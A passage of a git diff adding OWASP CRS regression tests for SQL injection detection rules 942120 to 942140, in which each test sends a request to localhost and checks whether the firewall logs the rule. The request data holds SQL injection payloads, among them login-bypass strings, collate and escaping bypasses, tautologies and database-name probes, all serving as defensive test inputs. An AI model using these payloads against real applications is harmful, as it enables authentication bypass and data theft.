text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=%26%26" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-5 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + 
headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "<<" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-6 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "%21%3D" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-7 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "||" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-8 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "XOR" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-9 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=%3C%3D" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-10 + desc: "SQL 
Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "IS NULL" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-11 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "in (0,1)" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-12 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "in (2147483647,-1)" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-13 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=%3C%3D%3E" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-14 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 
80 + uri: "/" + data: "regexp" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-15 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "RLIKE" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-16 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "<>" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-17 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "+in+%28++select+anfrage_id+from+erkenntnisse+where+id+is++not++null++%29%0A" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-18 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "+IN+%28815914%2C+815913%29%0A" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-19 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + 
headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "+IN+%28815919%2C+815920%2C+815921%2C+815922%2C+815923%2C+815924%2C+815925%2C+815926%2C+815927%2C+815928%2C+815929%2C+815930%2C+815932%2C+815933%2C+815934%2C+815935%2C+815936%2C+815937%2C+815917%2C+815918%29%0A" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-20 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay= in ( Aa,- Ab-, and Ac)" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-21 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "%3E%3D" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-22 + desc: "SQL Injection Attack: not between * and " + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "select%20*%20from%20user%20where%20password_last_changed%20not%20between%20'2021-04-11'%20and%20'2021-04-11'" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-23 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 
127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=z'or%20email%20notnull--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-24 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=x'%20or%20username%20like%20totpSecret%20escape%20'x';" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-25 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=admin%40juice-sh.op'%20and%20email%20ilike%20email--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-26 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=admin%40juice-sh.op'%20and%20email%20%3d%20all%20(select%20email)--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-27 + desc: "SQLite collate nocase" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=user'collate%20nocase--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-28 + desc: "SQLite collate nocase" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=user'collate%20nocase--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-29 + desc: "SQL collate`nocase`" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=user'collate%60nocase%60--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-30 + desc: "Invalid SQL collate foo" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=user'collate%20foo--" + version: HTTP/1.0 + output: + no_log_contains: id "942120" + - test_title: 942120-31 + desc: "Invalid SQL collate foo" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + # collate`utf8mb4_general_ci` + data: "var=user'collate%60utf8mb4_general_ci%60--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-32 + desc: 
"Collate bypass with character escaping" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + # collate"\utf8mb4_general_ci" + data: "var=user'collate%22%5Cutf8mb4_general_ci%22--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-33 + desc: "Collate bypass with postgress string escaping U&" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + # collate U&"\0441\043B\043E\043D" + data: "var=user'collate U%26%22%241%23B%23E%23D%22--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-34 + desc: "Detect auth bypass email=' notnull --" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=%27%20notnull%20--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-35 + desc: "Test for IJ5N1CXB - unlikely" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op'and%20unlikely%20(id)--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-36 + desc: "Negative test for IJ5N1CXB - unlikely" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + 
User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: + text=It is highly unlikely this is going to be a false positive + version: HTTP/1.0 + output: + no_log_contains: id "942120" + - test_title: 942120-37 + desc: "Test for HOH7M88Q - likelihood" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: | + email=admin%40juice-sh.op\'%20and(%20likelihood%20(id,.0));' + version: HTTP/1.1 + output: + log_contains: id "942120" + - test_title: 942120-38 + desc: "Negative test for HOH7M88Q - likelihood" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: | + text=After calculating the likelihood this should not be matched. + version: HTTP/1.1 + output: + no_log_contains: id "942120" + - test_title: 942120-39 + desc: "Detect path-based SQLi attempt" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: POST + uri: "/catalogue/rest/products/2499999||this.product/reviews" + version: HTTP/1.0 + output: + log_contains: id "942120" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml new file mode 100644 index 00000000..0056a006 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml 
@@ -0,0 +1,160 @@ +--- +meta: + author: "Christian S.J. Peron and Allan Boll, Franziska Bühler" + description: None + enabled: true + name: 942130.yaml +tests: + - test_title: 942130-1 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: /post + data: "var=%221%22%20sSOUNDS%20LIKE%20%22SOUNDS%20LIKE%201&other_var=test" + version: HTTP/1.0 + output: + no_log_contains: id "942130" + - test_title: 942130-2 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=1=1" + version: HTTP/1.1 + output: + log_contains: id "942130" + - test_title: 942130-3 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=11=1" + version: HTTP/1.1 + output: + no_log_contains: id "942130" + - test_title: 942130-4 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=1=11" + version: HTTP/1.1 + output: + no_log_contains: id "942130" + - test_title: 942130-5 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS 
test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=11!=11" + version: HTTP/1.1 + output: + no_log_contains: id "942130" + - test_title: 942130-6 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=b,1=1" + version: HTTP/1.1 + output: + log_contains: id "942130" + - test_title: 942130-7 + desc: "SQL Injection Attack: SQL Tautology - like" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "a=42%20like%2042" + version: HTTP/1.1 + output: + log_contains: id "942130" + - test_title: 942130-8 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=This%20is%20like%20no%20other" + version: HTTP/1.1 + output: + no_log_contains: id "942130" + - test_title: 942130-9 + desc: "SQL Injection Attack: SQL Tautology using MySQL NULL-safe operator <=>" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=42<=>42" + version: HTTP/1.1 + output: + log_contains: id "942130" + - test_title: 942130-10 + desc: "SQL Injection Attack: SQL Tautology using glob" + stages: + - stage: + 
input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ uri: "/?user=admin%40juice-sh.op'%20and%20password%20glob%20password;"
+ version: HTTP/1.1
+ output:
+ log_contains: id "942130"
diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml
new file mode 100644
index 00000000..934a8ac8
--- /dev/null
+++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml
@@ -0,0 +1,114 @@
+---
+meta:
+ author: "Felipe Zipitria"
+ description: SQL Tautology
+ enabled: true
+ name: 942131.yaml
+tests:
+ - test_title: 942131-1
+ desc: "SQL Injection Attack: SQL Tautology"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ uri: "/get?a=11!=1"
+ version: HTTP/1.1
+ output:
+ log_contains: id "942131"
+ - test_title: 942131-2
+ desc: "SQL Injection Attack: SQL Tautology"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ uri: "/get?a=1!=11"
+ version: HTTP/1.1
+ output:
+ log_contains: id "942131"
+ - test_title: 942131-3
+ desc: "SQL Injection Attack: SQL Tautology"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ uri: "/get?a=11!=11"
+ version: HTTP/1.1
+ output:
+ no_log_contains: id "942131"
+ - test_title: 942131-4
+ desc: "SQL Injection Attack: SQL Tautology"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ uri: "/get?a=1%20is%20not%202"
+ version: HTTP/1.1
+ output:
+ log_contains: id "942131"
+ - test_title: 942131-5
+ desc: "SQL Injection Attack: SQL Tautology negative"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ uri: "/get?a=1%20is%20not%201"
+ version: HTTP/1.1
+ output:
+ no_log_contains: id "942131"
+ - test_title: 942131-6
+ desc: "SQL Injection Attack: SQL Tautology"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ uri: "/post"
+ data: "a='1' not regexp '2'"
+ version: HTTP/1.1
+ output:
+ log_contains: id "942131"
+ - test_title: 942131-7
+ desc: "SQL Injection Attack: SQL Tautology"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ uri: "/post"
+ data: "a='1' not regexp '1'"
+ version: HTTP/1.1
+ output:
+ no_log_contains: id "942131"
diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml
new file mode 100644
index 00000000..1cdc7b66
--- /dev/null
+++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml
@@ -0,0 +1,295 @@ +--- +meta: + author: "Christian S.J. Peron, Christoph Hansen" + description: None + enabled: true + name: 942140.yaml +tests: + - test_title: 942140-1 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?sql_table=pg_catalog" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-2 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "INFORMATION_SCHEMA" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-3 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "database(" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-4 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "db_name(" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-5 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + 
headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "DaTaBasE(" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-6 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "InFoRmaTioN_ScHemA" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-7 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "DB_NAME(" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-8 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "tempdb" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-9 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "msdb" + version: HTTP/1.0 + output: + log_contains: id "942140" + - 
test_title: 942140-10 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "mysql.db" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-11 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "MSysAccessObjects" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-12 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "Northwind" + version: HTTP/1.0 + output: + log_contains: id 